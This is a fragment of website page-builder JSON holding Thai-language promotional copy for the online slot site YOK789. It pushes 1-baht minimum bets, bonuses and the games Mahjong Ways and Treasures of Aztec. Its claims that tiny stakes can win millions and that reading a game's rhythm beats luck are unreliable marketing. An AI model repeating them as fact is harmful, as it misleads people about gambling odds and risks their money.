\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 